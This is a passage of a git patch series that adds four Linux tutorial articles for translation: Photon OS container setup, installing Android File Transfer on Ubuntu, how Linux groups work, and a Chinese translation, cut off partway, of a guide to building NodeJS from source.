++++++++++++++++++ 1 file changed, 147 insertions(+) create mode 100644 sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md new file mode 100644 index 0000000000..9b8a98a9dd --- /dev/null +++ b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -0,0 +1,147 @@ +Photon Could Be Your New Favorite Container OS +============================================================ + + +![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") +Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay + +Containers are all the rage, and with good reason. [As discussed previously][13], containers allow you to quickly and easily deploy new services and applications onto your network, without requiring too much in the way of added system resources. Containers are more cost-effective than using dedicated hardware or virtual machines, and they’re easier to update and reuse. + +Best of all, containers love Linux (and vice versa). Without much trouble or time, you can get a Linux server up and running with [Docker][14] and deploying containers. But, which Linux distribution is best suited for the deployment of your containers? There are a _lot_  of options. You could go with a standard Ubuntu Server platform (which makes installing Docker and deploying containers incredibly easy), or you could opt for a lighter weight distribution — one geared specifically for the purpose of deploying containers. + +One such distribution is [Photon][15]. This particular platform was created in 2005 by [VMware][16]; it includes the Docker daemon and works with container frameworks, such as Mesos and Kubernetes. Photon is optimized to work with [VMware vSphere][17], but it can be used on bare metal, [Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], or [VirtualBox][21]. + +Photon manages to stay slim by only installing what is absolutely necessary to run the Docker daemon. In the end, the distribution comes in around 300 MB. This is just enough Linux make it all work. The key features to Photon are: + +* Kernel tuned for performance. + +* Kernel is hardened according to the [Kernel Self-Protection Project][6] (KSPP). + +* All installed packages are built with hardened security flags. + +* Operating system boots with validated trust. + +* Photon management daemon manages firewall, network, packages, and users on remote Photon OS machines. + +* Support for persistent volumes. + +* [Project Lightwave][7] integration. + +* Timely security patches and updates. + +Photon can be used via [ISO][22], [OVA][23], [Amazon Machine Image][24], [Google Compute Engine image][25], and [Azure VHD][26]. I’ll show you how to install Photon on VirtualBox, using an ISO image. The installation takes about five minutes and, in the end, you’ll have a virtual machine, ready to deploy containers. + +### Creating the virtual machine + +Before you deploy that first container, you have to create the virtual machine and install Photon. To do this, open up VirtualBox and click the New button. Walk through the Create Virtual Machine wizard (giving Photon the necessary resources, based on the usage you predict the container server will need). Once you’ve created the virtual machine, you need to first make a change to the settings. Select the newly created virtual machine (in the left pane of the VirtualBox main window) and then click Settings. In the resulting window, click on Network (from the left navigation). + +In the Networking window (Figure 1), you need to change the Attached to drop-down to Bridged Adapter. This will ensure your Photon server is reachable from your network. Once you’ve made that change, click OK. + +### [photon_0.jpg][8] + +![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change settings") +Figure 1: Changing the VirtualBox network settings for Photon.[Used with permission][1] + +Select your Photon virtual machine from the left navigation and then click Start. You will be prompted to locate and attach the IOS image. Once you’ve done that, Photon will boot up and prompt you to hit Enter to begin the installation. The installation is ncurses based (there is no GUI), but it’s incredibly simple. + +In the next screen (Figure 2), you will be asked if you want to do a Minimal, Full, or OSTree Server. I opted to go the Full route. Select whichever option you require and hit enter. + +### [photon_1.jpg][9] + +![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") +Figure 2: Selecting your installation type.[Used with permission][2] + +In the next window, select the disk that will house Photon. Since we’re installing this as a virtual machine, there will be only one disk listed (Figure 3). Tab down to Auto and hit Enter on your keyboard. The installation will then require you to type (and verify) an administrator password. Once you’ve done that, the installation will begin and finish in less than five minutes. + +### [photon_2.jpg][10] + +![Photon ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") +Figure 3: Selecting your hard disk for the Photon installation.[Used with permission][3] + +Once the installation completes, reboot the virtual machine and log in with the username root and the password you created during installation. You are ready to start working. + +Before you begin using Docker on Photon, you’ll want to upgrade the platform. Photon uses the _yum_ package manager, so login as root and issue the command  _yum update_ .If there are any updates available, you’ll be asked to okay the process (Figure 4). + +### [photon_3.jpg][11] + +![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") +Figure 4: Updating Photon.[Used with permission][4] + +Usage + +As I mentioned, Photon comes with everything you need to deploy containers or even create a Kubernetes cluster. However, out of the box, there are a few things you’ll need to do. The first thing is to enable the Docker daemon to run at start. To do this, issue the commands: + +``` +systemctl start docker + +systemctl enable docker +``` + +Now we need to create a standard user, so we’re not running the docker command as root. To do this, issue the following commands: + +``` +useradd -m USERNAME + +passwd USERNAME +``` + +Where USERNAME is the name of the user to add. + +Next we need to add the new user to the  _docker_ group with the command: + +``` +usermod -a -G docker USERNAME +``` + +Where USERNAME is the name of the user just created. + +Log out as the root user and log back in as the newly created user. You can now work with the  _docker _ command without having to make use of  _sudo_  or switching to the root user. Pull down an image from Docker Hub and start deploying containers. + +### An outstanding container platform + +Photon is, without a doubt, an outstanding platform, geared specifically for containers. Do note that Photon is an open source project, so there is no paid support to be had. If you find yourself having trouble with Photon, hop on over to the [Issues tab in the Photon Project’s Github page][27], where you can read and post about issues. And if you’re interested in forking Photon, you’ll find the source code on the project’s [official Github page][28]. + +Give Photon a try and see if it doesn’t make deploying Docker containers and/or Kubernetes clusters significantly easier. + + _Learn more about Linux through the free ["Introduction to Linux" ][29]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os + +作者:[JACK WALLEN ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/creative-commons-zero +[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project +[7]:http://vmware.github.io/lightwave/ +[8]:https://www.linux.com/files/images/photon0jpg +[9]:https://www.linux.com/files/images/photon1jpg +[10]:https://www.linux.com/files/images/photon2jpg +[11]:https://www.linux.com/files/images/photon3jpg +[12]:https://www.linux.com/files/images/photon-linuxjpg +[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux +[14]:https://www.docker.com/ +[15]:https://vmware.github.io/photon/ +[16]:https://www.vmware.com/ +[17]:https://www.vmware.com/products/vsphere.html +[18]:https://azure.microsoft.com/ +[19]:https://cloud.google.com/compute/ +[20]:https://aws.amazon.com/ec2/ +[21]:https://www.virtualbox.org/ +[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[27]:https://github.com/vmware/photon/issues +[28]:https://github.com/vmware/photon +[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux From 732e994c3f5e03e607e5138cace15c3435ac6a3c Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 16:09:21 +0800 Subject: [PATCH 0054/1627] =?UTF-8?q?20171129-8=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Install Android File Transfer for Linux.md | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 sources/tech/20171124 How to Install Android File Transfer for Linux.md diff --git a/sources/tech/20171124 How to Install Android File Transfer for Linux.md b/sources/tech/20171124 How to Install Android File Transfer for Linux.md new file mode 100644 index 0000000000..b5078c2e01 --- /dev/null +++ b/sources/tech/20171124 How to Install Android File Transfer for Linux.md @@ -0,0 +1,79 @@ +# How to Install Android File Transfer for Linux + +If you’re struggling to mount your Android phone on Ubuntu you might want to give [Android File Transfer for Linux][4] a try. + +Effectively it’s a clone of Google’s [Android File Transfer][6] app for macOS. It’s built with Qt, and has a super simple UI that makes it easy to transfer files and folders to and from your Android smartphone and your Ubuntu machine. + +Now, chances are a few of you will be scratching your head wondering what this app does that Nautilus, the default file manager in Ubuntu, doesn’t — and the answer is nothing. + +When I connect my Nexus 5X (and remember to select the [MTP][7] option) to my Ubuntu machine I can browse, open and manage it using Nautilus, just like my phone was a regular USB drive thanks to [GVfs][8]: + + [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] + +But  _some_  people experience issues with this, and other MTP implementations, such as directories not loading, directory creation that doesn’t “stick”, and issues using their device inside a media player. + +And it’s for those people whom Android File Transfer for Linux is designed. Consider it an alternative to other methods of mounting MTP devices on Linux. If what you use currently works a-ok, you probably don’t need to try this out (unless you really like trying things out). + +![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) + +The app features: + +* A straightforward user interface + +* Drag and drop support (Linux to Phone) + +* Batch downloading (Phone to Linux) + +* Transfer progress dialogs + +* FUSE wrapper + +* No file size limits + +* Optional CLI tool + +### Install Android File Transfer on Ubuntu + +That’s enough waffle about this alternative way to mount your Android phone, on to the nitty gritty of installing it. + +Helpfully there’s a [PPA available][10] which provides builds for Ubuntu 14.04 LTS, 16.04 LTS and Ubuntu 17.10. + +To add the PPA to your list of software sources run this command: + +``` +sudo add-apt-repository ppa:samoilov-lex/aftl-stable +``` + +Then, to install Android File Transfer for Linux on Ubuntu, run: + +``` +sudo apt-get update && sudo apt install android-file-transfer +``` + +That’s pretty much it. + +You’ll find a launcher for the app in your app menu. + +Before launching it do make make sure that no other devices (such as Nautilus) mount your phone first. If anything is using it the app will report “no MTP device found”. To fix, unmount your device from Nautilus (or whichever app is using it) then relaunch Android File Transfer. + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux + +作者:[ JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/app +[3]:http://www.omgubuntu.co.uk/category/download +[4]:https://github.com/whoozle/android-file-transfer-linux +[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux +[6]:http://android.com/filetransfer?linkid=14270770 +[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol +[8]:https://en.wikipedia.org/wiki/GVfs +[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg +[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable From 06f7c43697cd398809b82932b90223acee2b4cc3 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 16:11:36 +0800 Subject: [PATCH 0055/1627] =?UTF-8?q?20171129-9=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171124 How do groups work on Linux.md | 141 ++++++++++++++++++ 1 file changed, 141 insertions(+) create mode 100644 sources/tech/20171124 How do groups work on Linux.md diff --git a/sources/tech/20171124 How do groups work on Linux.md b/sources/tech/20171124 How do groups work on Linux.md new file mode 100644 index 0000000000..bc1833b0d6 --- /dev/null +++ b/sources/tech/20171124 How do groups work on Linux.md @@ -0,0 +1,141 @@ +How do groups work on Linux? +============================================================ + +Hello! Last week, I thought I knew how users and groups worked on Linux. Here is what I thought: + +1. Every process belongs to a user (like `julia`) + +2. When a process tries to read a file owned by a group, Linux a) checks if the user `julia` can access the file, and b) checks which groups `julia` belongs to, and whether any of those groups owns & can access that file + +3. If either of those is true (or if the ‘any’ bits are set right) then the process can access the file + +So, for example, if a process is owned by the `julia` user and `julia` is in the `awesome` group, then the process would be allowed to read this file. + +``` +r--r--r-- 1 root awesome 6872 Sep 24 11:09 file.txt + +``` + +I had not thought carefully about this, but if pressed I would have said that it probably checks the `/etc/group` file at runtime to see what groups you’re in. + +### that is not how groups work + +I found out at work last week that, no, what I describe above is not how groups work. In particular Linux does **not** check which groups a process’s user belongs to every time that process tries to access a file. + +Here is how groups actually work! I learned this by reading Chapter 9 (“Process Credentials”) of [The Linux Programming Interface][1] which is an incredible book. As soon as I realized that I did not understand how users and groups worked, I opened up the table of contents with absolute confidence that it would tell me what’s up, and I was right. + +### how users and groups checks are done + +They key new insight for me was pretty simple! The chapter starts out by saying that user and group IDs are **attributes of the process**: + +* real user ID and group ID; + +* effective user ID and group ID; + +* saved set-user-ID and saved set-group-ID; + +* file-system user ID and group ID (Linux-specific); and + +* supplementary group IDs. + +This means that the way Linux **actually** does group checks to see a process can read a file is: + +* look at the process’s group IDs & supplementary group IDs (from the attributes on the process, **not** by looking them up in `/etc/group`) + +* look at the group on the file + +* see if they match + +Generally when doing access control checks it uses the **effective** user/group ID, not the real user/group ID. Technically when accessing a file it actually uses the **file-system** ids but those are usually the same as the effective uid/gid. + +### Adding a user to a group doesn’t put existing processes in that group + +Here’s another fun example that follows from this: if I create a new `panda` group and add myself (bork) to it, then run `groups` to check my group memberships – I’m not in the panda group! + +``` +bork@kiwi~> sudo addgroup panda +Adding group `panda' (GID 1001) ... +Done. +bork@kiwi~> sudo adduser bork panda +Adding user `bork' to group `panda' ... +Adding user bork to group panda +Done. +bork@kiwi~> groups +bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd + +``` + +no `panda` in that list! To double check, let’s try making a file owned by the `panda`group and see if I can access it: + +``` +$ touch panda-file.txt +$ sudo chown root:panda panda-file.txt +$ sudo chmod 660 panda-file.txt +$ cat panda-file.txt +cat: panda-file.txt: Permission denied + +``` + +Sure enough, I can’t access `panda-file.txt`. No big surprise there. My shell didn’t have the `panda` group as a supplementary GID before, and running `adduser bork panda` didn’t do anything to change that. + +### how do you get your groups in the first place? + +So this raises kind of a confusing question, right – if processes have groups baked into them, how do you get assigned your groups in the first place? Obviously you can’t assign yourself more groups (that would defeat the purpose of access control). + +It’s relatively clear how processes I **execute** from my shell (bash/fish) get their groups – my shell runs as me, and it has a bunch of group IDs on it. Processes I execute from my shell are forked from the shell so they get the same groups as the shell had. + +So there needs to be some “first” process that has your groups set on it, and all the other processes you set inherit their groups from that. That process is called your **login shell** and it’s run by the `login` program (`/bin/login`) on my laptop. `login` runs as root and calls a C function called `initgroups` to set up your groups (by reading `/etc/group`). It’s allowed to set up your groups because it runs as root. + +### let’s try logging in again! + +So! Let’s say I am running in a shell, and I want to refresh my groups! From what we’ve learned about how groups are initialized, I should be able to run `login` to refresh my groups and start a new login shell! + +Let’s try it: + +``` +$ sudo login bork +$ groups +bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd panda +$ cat panda-file.txt # it works! I can access the file owned by `panda` now! + +``` + +Sure enough, it works! Now the new shell that `login` spawned is part of the `panda` group! Awesome! This won’t affect any other shells I already have running. If I really want the new `panda` group everywhere, I need to restart my login session completely, which means quitting my window manager and logging in again. + +### newgrp + +Somebody on Twitter told me that if you want to start a new shell with a new group that you’ve been added to, you can use `newgrp`. Like this: + +``` +sudo addgroup panda +sudo adduser bork panda +newgrp panda # starts a new shell, and you don't have to be root to run it! + +``` + +You can accomplish the same(ish) thing with `sg panda bash` which will start a `bash` shell that runs with the `panda` group. + +### setuid sets the effective user ID + +I’ve also always been a little vague about what it means for a process to run as “setuid root”. It turns out that setuid sets the effective user ID! So if I (`julia`) run a setuid root process (like `passwd`), then the **real** user ID will be set to `julia`, and the **effective** user ID will be set to `root`. + +`passwd` needs to run as root, but it can look at its real user ID to see that `julia`started the process, and prevent `julia` from editing any passwords except for `julia`’s password. + +### that’s all! + +There are a bunch more details about all the edge cases and exactly how everything works in The Linux Programming Interface so I will not get into all the details here. That book is amazing. Everything I talked about in this post is from Chapter 9, which is a 17-page chapter inside a 1300-page book. + +The thing I love most about that book is that reading 17 pages about how users and groups work is really approachable, self-contained, super useful, and I don’t have to tackle all 1300 pages of it at once to learn helpful things :) + +-------------------------------------------------------------------------------- + +via: https://jvns.ca/blog/2017/11/20/groups/ + +作者:[Julia Evans ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://jvns.ca/ +[1]:http://man7.org/tlpi/ From 599f9b1ba493cab1d2d460ccc95c336f4a6da938 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Wed, 29 Nov 2017 16:21:41 +0800 Subject: [PATCH 0056/1627] Translated by qhwdw Translated by qhwdw --- ...Source Code... and Remove it Afterwards.md | 514 ++++++++++++++++++ 1 file changed, 514 insertions(+) create mode 100644 translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md diff --git a/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md new file mode 100644 index 0000000000..9673771438 --- /dev/null +++ b/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md @@ -0,0 +1,514 @@ +怎么用源代码安装软件 … 以及如何卸载它 +============================================================ + +![How to install software from source code](https://itsfoss.com/wp-content/uploads/2017/10/install-software-from-source-code-linux-800x450.jpg) + + _简介:这篇文章详细介绍了在 Linux 中怎么用源代码安装程序,以及怎么去卸载源代码安装的程序。_ + +你的 Linux 分发版的其中一个最大的优点就是它的包管理器和相关的软件库。正是因为它们,你才可以去下载所需的工具和资源,以及在你的计算机上完全自动化地安装一个新软件。 + +但是,尽管他们付出了很多的努力,包维护者仍然没法做到处理好每个用到的依赖,也不可能将所有的可用软件都打包进去。因此,仍然存在需要你自已去编译和安装一个新软件的情形。对于我来说,到目前为止,最主要的原因是,当我需要去运行一个特定的版本时我还要编译一些软件。或者,我想去修改源代码或使用一些想要的编译选项。 + +如果你也属于后一种情况,那你已经知道你应该做什么了。但是,对于绝大多数的 Linux 用户来说,第一次从源代码中编译和安装一个软件看上去像是一个入门的仪式:它让很多人感到恐惧;但是,如果你能克服困难,你将可能进入一个全新的世界,并且,如果你做到了,那么你将成为社区中享有特权的一部分人。 + +[Suggested readHow To Install And Remove Software In Ubuntu [Complete Guide]][8] + +### A. 在 Linux 中从源代码开始安装软件 + +这正是我们要做的。因为这篇文章的需要,我要在我的系统上安装 [NodeJS][9] 8.1.1。它是个完全真实的版本。这个版本在 Debian 仓库中不可用: + +``` +sh$ apt-cache madison nodejs | grep amd64 + nodejs | 6.11.1~dfsg-1 | http://deb.debian.org/debian experimental/main amd64 Packages + nodejs | 4.8.2~dfsg-1 | http://ftp.fr.debian.org/debian stretch/main amd64 Packages + nodejs | 4.8.2~dfsg-1~bpo8+1 | http://ftp.fr.debian.org/debian jessie-backports/main amd64 Packages + nodejs | 0.10.29~dfsg-2 | http://ftp.fr.debian.org/debian jessie/main amd64 Packages + nodejs | 0.10.29~dfsg-1~bpo70+1 | http://ftp.fr.debian.org/debian wheezy-backports/main amd64 Packages +``` + +### 第 1 步:从 GitHub 上获取源代码 + +像大多数开源项目一样,NodeJS 的源代码可以在 GitHub:[https://github.com/nodejs/node][10] 上找到。 + +所以,我们直接开始吧。 + +![The NodeJS official GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-account.png) + +如果你不熟悉 [GitHub][11]、[git][12] 或者提到的其它的包含这个软件源代码的 [版本管理系统][13],以及多年来对该软件的所有修改的历史,最终找到该软件的最早版本。对于开发者来说,保持它的历史版本有很多好处。对现在的我来说,其中一个好处是可以得到任何一个给定时间点的项目源代码。更准确地说,当我希望的 8.1.1 版发布时,我可以像他们一样第一时间得到源代码。即便他们有很多的修改。 + +![Choose the v8.1.1 tag in the NodeJS GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-choose-revision-tag.png) + +在 GitHub 上,你可以使用 “branch” 按钮导航到这个软件的不同版本。[在 Git 中 “Branch” 和 “tags” 相关的一些概念][14]。总的来说,开发者创建 “branch” 和 “tags” 在项目历史中对重要事件保持跟踪,就像当她们启用一个新特性或者发布一个新版本。在这里先不详细介绍了,所有你想知道的都可以看 _tagged_ 的 “v8.1.1” 版本。 + +![The NodeJS GitHub repository as it was at the time the v8.1.1 tag was created](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-811.png) + +在选择了 “v8.1.1” 标签后,页面被刷新,最显著的变化是标签现在作为 URL 的一部分出现。另外,你可能会注意到文件改变数据也不同。在源代码树上,你可以看到现在已经创建了 v8.1.1 标签。在某种意义上,你也可以认为像 git 这样的版本管理工具是一个时光穿梭机,允许你返回进入到以前的项目历史中。 + +![NodeJS GitHub repository download as a ZIP button](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-download-zip.png) + +在这个时候,我们可以下载 NodeJS 8.1.1 的源代码。你不要错过大的蓝色按钮,建议下载一个项目的 ZIP 压缩包。对于我来说,为讲解的目的,我从命令行中下载并解压这个 ZIP 压缩包。但是,如果你更喜欢使用一个 [GUI][15] 工具,不用担心,你可以这样做: + +``` +wget https://github.com/nodejs/node/archive/v8.1.1.zip +unzip v8.1.1.zip +cd node-8.1.1/ +``` + +下载一个 ZIP 包它做的很好,但是如果你希望去做 “like a pro”,我建议你直接使用 `git` 工具去下载源代码。它一点也不复杂 — 并且如果你是第一次使用一个工具,它将是一个很好的开端,你以后将经常用到它: + +``` +# first ensure git is installed on your system +sh$ sudo apt-get install git +# Make a shallow clone the NodeJS repository at v8.1.1 +sh$ git clone --depth 1 \ + --branch v8.1.1 \ + https://github.com/nodejs/node +sh$ cd node/ +``` + +顺便说一下,如果你想发布任何项目,正好可以考虑把这篇文章的第一部分做为一个总体介绍。后面,为了帮你排除常问题,我们将更详细地解释基于 Debian 和基于 ReadHat 的发布。 + +不管怎样,在你使用 `git` 或者作为一个 ZIP 压缩包下载了源代码后,你现在应该在当前的目录下提取源代码文件: + +``` +sh$ ls +android-configure BUILDING.md common.gypi doc Makefile src +AUTHORS CHANGELOG.md configure GOVERNANCE.md node.gyp test +benchmark CODE_OF_CONDUCT.md CONTRIBUTING.md lib node.gypi tools +BSDmakefile COLLABORATOR_GUIDE.md deps LICENSE README.md vcbuild.bat +``` + +### 第 2 步:理解程序的构建系统 + +构建系统就是我们通常所说的 "编译源代码”, 其实,编译只是从源代码中生成一个可使用的软件的其中一个阶段。一个构建系统是一套工具,在具体的实践中,为了完全构建一个软件,仅仅需要发出几个命令就可以自动并清晰地完成这些不同的任务。 + +虽然概念很简单,实际上编译做了很多事情。因为不同的项目或者编程语言可能要求不一样,或者是因为编程体验,或者因为支持的平台、或者因为历史的原因,或者 … 或者 … 选择或创建其它的构建系统的原因有很多。所有的这些都说明可用的不同的解决方案有很多。 + +NodeJS 使用一个 [GNU 风格的构建系统][16]。在开源社区中这是一个很流行的选择。一旦开始,将进入一段精彩的旅程。 + +写出和调优一个构建系统是一个非常复杂的任务。但是,作为 “终端用户” 来说, GNU 风格的构建系统使用两个工具来构建它们:`configure` 和 `make`。 + +`configure` 文件是项目专用的脚本,为了确保项目可以被构建,它将检查目标系统配置和可用功能,最后使用当前平台专用的脚本来处理构建工作。 + +一个典型的 `configure` 作业的重要部分是去构建 `Makefile`。这个文件包含有效构建项目所需的指令。 + +([`make` 工具][17]),另一方面,一个 POSIX 工具可用于任何类 Unix 系统。它将读取项目专用的 `Makefile` 然后执行所需的操作去构建和安装你的程序。 + +但是,在 Linux 的世界中,你仍然有一些原因去定制你自己专用的构建。 + +``` +./configure --help +``` + +`configure -help` 命令将展示所有你可用的配置选项。再强调一下,它是项目专用的。说实话,有时候,在你完全理解每个配置选项的作用之前,你需要深入到项目中去好好研究。 + +但是,这里至少有一个标准的 GNU 自动化工具选项,它就是众所周知的 `--prefix` 选项。它与文件系统的层次结构有关,它是你软件要安装的位置。 + +[Suggested read8 Vim Tips And Tricks That Will Make You A Pro User][18] + +### 第 3 步:文件系统层次化标准(FHS) + +大部分典型的 Linux 分发版的文件系统层次结构都遵从 [文件系统层次化标准(FHS)][19]。 + +这个标准说明了你的系统中各种目录的用途,比如,`/usr`、`/tmp`、`/var` 等等。 + +当使用 GNU 自动化工具 _和大多数其它的构建系统_ 时,它的默认安装位置都在你的系统的 `/usr/local` 目录中。依据 FHS 中 _“/usr/local 层级是为系统管理员安装软件的位置使用的,它在系统软件更新时是覆盖安全的。它可以被用于一个主机组中,在 /usr 中找不到的、可共享的程序和数据”_ ,因此,它是一个非常好的选择。 + +`/usr/local` 层次以某种方式复制了 root 目录,并且你可以在 `/usr/local/bin` 这里找到可执行程序,在 `/usr/local/lib` 中是库,在 `/usr/local/share` 中是架构依赖文件,等等。 + +使用 `/usr/local` 树作为你定制安装的软件位置的唯一问题是,你的软件将在这里混杂在一起。尤其是你安装了多个软件之后,将很难去准确地跟踪 `/usr/local/bin` 和 `/usr/local/lib` 到底属于哪个软件。它虽然不足以在你的系统上产生问题。毕竟,`/usr/bin` 是很混乱的。但是,它在你想去手工卸载已安装的软件时会将成为一个问题。 + +去解决这个问题,我通常喜欢安装定制的软件到 `/opt` 子目录下。再次引用 FHS: + + _“`/opt` 是为安装应用程序插件软件包而保留的。一个包安装在 `/opt` 下必须在 `/opt/` 或者 `/opt/` 目录中独立定位到它的静态文件,`` 处是所说的那个软件名的名字,而 `` 处是提供者的 LANANA 注册名字。”_(译者注:LANANA 是指 The Linux Assigned Names And Numbers Authority,http://www.lanana.org/ ) + +因此,我们将在 `/opt` 下创建一个子目录,用于我们定制的 NodeJS 的安装。并且,如果有一天我想去卸载它,我只是很简单地去删除那个目录: + +``` +sh$ sudo mkdir /opt/node-v8.1.1 +sh$ sudo ln -sT node-v8.1.1 /opt/node +# What is the purpose of the symbolic link above? +# Read the article till the end--then try to answer that +# question in the comment section! + +sh$ ./configure --prefix=/opt/node-v8.1.1 +sh$ make -j9 && echo ok +# -j9 means run up to 9 parallel tasks to build the software. +# As a rule of thumb, use -j(N+1) where N is the number of cores +# of your system. That will maximize the CPU usage (one task per +# CPU thread/core + a provision of one extra task when a process +# is blocked by an I/O operation. +``` + +在你运行完成 `make` 命令之后,如果有任何的除了 “ok” 以外的信息,将意味着在构建过程中有错误。比如,我们使用一个 `-j` 选项去运行一个并行构建,在构建系统的大量输出过程中,检索错误信息并不是件很容易的事。 + +在这种情况下,只能是重新开始 `make`,并且不要使用 `-j` 选项。这样错误将会出现在输出信息的最后面: + +``` +sh$ make +``` + +最终,编译结束后,你可以运行这个命令去安装你的软件: + +``` +sh$ sudo make install +``` + +然后测试它: + +``` +sh$ /opt/node/bin/node --version +v8.1.1 +``` + +### B. 如果在源代码安装的过程中出现错误怎么办? + +我上面介绍的是大多数的文档丰富的项目在“构建指令”页面上你所看到的。但是,本文的目标是让你从源代码开始去编译你的第一个软件,它可能要花一些时间去研究一些常见的问题。因此,我将再次重新开始一遍整个过程,但是,这次是在一个最新的、最小化安装的 Debian 9.0 和 CentOS 7.0 系统上。因此,你可能看到很多的错误和我怎么去解决它。 + +### 从 Debian 9.0 中 “Stretch” 开始 + +``` +itsfoss@debian:~$ git clone --depth 1 \ + --branch v8.1.1 \ + https://github.com/nodejs/node +-bash: git: command not found +``` + +这个问题非常容易去诊断和解决。仅仅是去安装这个 `git` 包: + +``` +itsfoss@debian:~$ sudo apt-get install git +``` + +``` +itsfoss@debian:~$ git clone --depth 1 \ + --branch v8.1.1 \ + https://github.com/nodejs/node && echo ok +[...] +ok +``` + +``` +itsfoss@debian:~/node$ sudo mkdir /opt/node-v8.1.1 +itsfoss@debian:~/node$ sudo ln -sT node-v8.1.1 /opt/node +``` + +现在没有问题了。 + +``` +itsfoss@debian:~/node$ ./configure --prefix=/opt/node-v8.1.1/ +WARNING: failed to autodetect C++ compiler version (CXX=g++) +WARNING: failed to autodetect C compiler version (CC=gcc) +Node.js configure error: No acceptable C compiler found! + Please make sure you have a C compiler installed on your system and/or + consider adjusting the CC environment variable if you installed + it in a non-standard prefix. +``` + +很显然,编译一个项目,你需要一个编译器。NodeJS 是使用 [C++ language][20] 写的,我们需要一个 C++ [编译器][21]。在这里我将安装 `g++`,它就是为这个目的写的 GNU C++ 编译器: + +``` +itsfoss@debian:~/node$ sudo apt-get install g++ +itsfoss@debian:~/node$ ./configure --prefix=/opt/node-v8.1.1/ && echo ok +[...] +ok +``` + +``` +itsfoss@debian:~/node$ make -j9 && echo ok +-bash: make: command not found +``` + +还差一个其它工具。同样的症状。同样的解决方案: + +``` +itsfoss@debian:~/node$ sudo apt-get install make +itsfoss@debian:~/node$ make -j9 && echo ok +[...] +ok +``` + +``` +itsfoss@debian:~/node$ sudo make install +[...] +itsfoss@debian:~/node$ /opt/node/bin/node --version +v8.1.1 +``` + +成功! + +请注意:我将安装各种工具一步一步去展示怎么去诊断编译问题,以及展示怎么去解决这些问题。但是,如果你搜索关于这个主题的更多文档,或者读其它的教程,你将发现,很多分发版有一个 “meta-packages”,它像一个伞一样去安装一系列的或者全部的常用工具用于编译软件。在基于 Debian 